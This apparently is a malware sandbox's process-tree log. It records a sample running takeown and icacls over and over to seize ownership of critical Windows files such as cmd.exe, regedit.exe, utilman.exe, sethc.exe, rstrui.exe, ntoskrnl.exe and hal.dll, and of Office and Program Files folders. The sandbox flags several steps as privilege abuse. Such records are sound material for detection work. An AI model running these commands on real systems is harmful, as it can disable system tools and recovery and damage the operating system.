C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C" /a2⤵PID:2144
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\cmd.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:332
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:2092
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\cmd.exe" /grant Administrators:F2⤵PID:2344
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe" /a2⤵PID:1232
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0011-0000-0000-0000000FF1CE}-C\ose.exe" /grant Administrators:F2⤵PID:2528
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C" /a2⤵PID:2640
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:1464
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\regedit.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.msi" /a2⤵PID:2184
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\regedit.exe" /grant Administrators:F2⤵
- Modifies file permissions
PID:2244
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\ExcelMUI.msi" /grant Administrators:F2⤵PID:2932
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C" /a2⤵PID:408
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\reg.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:1016
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\reg.exe" /grant Administrators:F2⤵PID:1152
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.msi" /a2⤵
- Modifies file permissions
PID:1952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0018-0409-0000-0000000FF1CE}-C\PowerPointMUI.msi" /grant Administrators:F2⤵PID:1552
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C" /a2⤵PID:1688
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:1620
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\taskmgr.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2012
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\taskmgr.exe" /grant Administrators:F2⤵PID:1920
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.msi" /a2⤵PID:1188
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0019-0409-0000-0000000FF1CE}-C\PublisherMUI.msi" /grant Administrators:F2⤵PID:1776
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C" /a2⤵PID:1912
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:1424
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.msi" /a2⤵PID:2364
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-001A-0409-0000-0000000FF1CE}-C\OutlookMUI.msi" /grant Administrators:F2⤵PID:2828
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\msconfig.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\msconfig.exe" /grant Administrators:F2⤵PID:2356
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C" /a2⤵PID:2812
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:2596
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.msi" /a2⤵PID:780
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-001B-0409-0000-0000000FF1CE}-C\WordMUI.msi" /grant Administrators:F2⤵PID:908
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C" /a2⤵PID:2580
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\utilman.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1652
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:2340
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\utilman.exe" /grant Administrators:F2⤵PID:2020
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.msi" /a2⤵PID:1336
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proofing.msi" /grant Administrators:F2⤵
- Modifies file permissions
PID:572
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en" /a2⤵PID:2400
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en" /grant Administrators:F2⤵PID:2104
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\sethc.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.msi" /a2⤵PID:1972
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\sethc.exe" /grant Administrators:F2⤵PID:2184
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.en\Proof.msi" /grant Administrators:F2⤵PID:808
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es" /a2⤵PID:2276
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es" /grant Administrators:F2⤵PID:1700
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.msi" /a2⤵PID:952
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.es\Proof.msi" /grant Administrators:F2⤵PID:2124
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\perfmon.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:692
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\perfmon.exe" /grant Administrators:F2⤵PID:2056
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr" /a2⤵PID:1236
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr" /grant Administrators:F2⤵PID:1984
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.msi" /a2⤵PID:2440
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-002C-0409-0000-0000000FF1CE}-C\Proof.fr\Proof.msi" /grant Administrators:F2⤵PID:1980
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C" /a2⤵PID:1920
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:2844
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\perfmon.msc" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1900
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\perfmon.msc" /grant Administrators:F2⤵PID:1616
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.msi" /a2⤵PID:1704
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\InfoPathMUI.msi" /grant Administrators:F2⤵PID:2800
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C" /a2⤵PID:2716
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:2356
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\resmon.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2804
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\resmon.exe" /grant Administrators:F2⤵PID:3004
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.msi" /a2⤵PID:3000
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\OneNoteMUI.msi" /grant Administrators:F2⤵PID:1608
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C" /a2⤵PID:2636
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:2160
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.msi" /a2⤵PID:1396
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\GrooveMUI.msi" /grant Administrators:F2⤵PID:1940
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\logonui.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2852
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\logonui.exe" /grant Administrators:F2⤵PID:1448
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C" /a2⤵PID:1228
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:1548
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\DW20.EXE" /a2⤵PID:2932
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\DW20.EXE" /grant Administrators:F2⤵PID:332
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033" /a2⤵PID:2184
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0115-0409-0000-0000000FF1CE}-C\1033" /grant Administrators:F2⤵PID:2152
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C" /a2⤵PID:1532
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\taskkill.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2276
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:1772
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\taskkill.exe" /grant Administrators:F2⤵PID:2124
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.msi" /a2⤵PID:2516
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUI.msi" /grant Administrators:F2⤵PID:752
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.msi" /a2⤵PID:1268
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0116-0409-1000-0000000FF1CE}-C\Office64MUISet.msi" /grant Administrators:F2⤵PID:2060
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C" /a2⤵PID:2448
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\rundll32.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2912
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C" /grant Administrators:F2⤵PID:1400
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\rundll32.exe" /grant Administrators:F2⤵PID:1728
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.msi" /a2⤵PID:1708
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\AccessMUISet.msi" /grant Administrators:F2⤵PID:2980
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us" /a2⤵PID:2264
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us" /grant Administrators:F2⤵PID:2576
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\rstrui.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.msi" /a2⤵PID:2704
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\rstrui.exe" /grant Administrators:F2⤵PID:2652
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\MSOCache\All Users\{90140000-0117-0409-0000-0000000FF1CE}-C\Access.en-us\AccessMUI.msi" /grant Administrators:F2⤵PID:3016
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\PerfLogs" /a2⤵PID:1440
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\PerfLogs" /grant Administrators:F2⤵PID:1648
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\PerfLogs\Admin" /a2⤵PID:2188
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\PerfLogs\Admin" /grant Administrators:F2⤵PID:2600
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files" /a2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:484
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files" /grant Administrators:F2⤵PID:1348
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\sfc.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1668
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\sfc.exe" /grant Administrators:F2⤵PID:1396
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\winload.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1988
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\winload.exe" /grant Administrators:F2⤵PID:320
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip" /a2⤵PID:3064
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip" /grant Administrators:F2⤵PID:2064
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\ntoskrnl.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1884
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\ntoskrnl.exe" /grant Administrators:F2⤵PID:356
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip\7z.exe" /a2⤵PID:316
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip\7z.exe" /grant Administrators:F2⤵PID:1676
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\7-Zip\Lang" /a2⤵PID:2092
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\7-Zip\Lang" /grant Administrators:F2⤵PID:2148
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2484
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files" /grant Administrators:F2⤵PID:896
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:788
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared" /grant Administrators:F2⤵PID:2184
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\Filters" /a2⤵PID:1108
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\Filters" /grant Administrators:F2⤵PID:984
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\system32\hal.dll" /a2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1456
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:752
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\system32\hal.dll" /grant Administrators:F2⤵PID:1472
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink" /grant Administrators:F2⤵PID:1984
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2456
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ConvertInkStore.exe" /grant Administrators:F2⤵
- Possible privilege escalation attempt
PID:2676
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1188
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA" /grant Administrators:F2⤵PID:2912
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1420
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\servicing\trustedinstaller.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\bg-BG" /grant Administrators:F2⤵PID:1728
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2568
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\servicing\trustedinstaller.exe" /grant Administrators:F2⤵PID:2924
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\cs-CZ" /grant Administrators:F2⤵PID:2712
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\da-DK" /grant Administrators:F2⤵PID:2264
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2612
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\de-DE" /grant Administrators:F2⤵PID:2816
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1408
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\el-GR" /grant Administrators:F2⤵PID:2704
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\en-US" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:780
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\cmd.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1828
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\cmd.exe" /grant Administrators:F2⤵PID:644
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\en-US" /grant Administrators:F2⤵PID:1404
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2888
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\es-ES" /grant Administrators:F2⤵PID:2608
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:804
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\windows\syswow64\regedit.exe" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2188
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\et-EE" /grant Administrators:F2⤵PID:484
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\windows\syswow64\regedit.exe" /grant Administrators:F2⤵PID:1252
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fi-FI" /grant Administrators:F2⤵PID:1548
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fr-FR" /grant Administrators:F2⤵PID:2416
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:332
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions" /grant Administrators:F2⤵PID:2120
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad" /a2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1700
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\auxpad" /grant Administrators:F2⤵PID:2148
-
-
C:\windows\system32\takeown.exe"C:\windows\system32\takeown.exe" /f "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad" /a2⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1016
-
-
C:\windows\system32\icacls.exe"C:\windows\system32\icacls.exe" "C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad" /grant Administrators:F2⤵PID:848
-
-
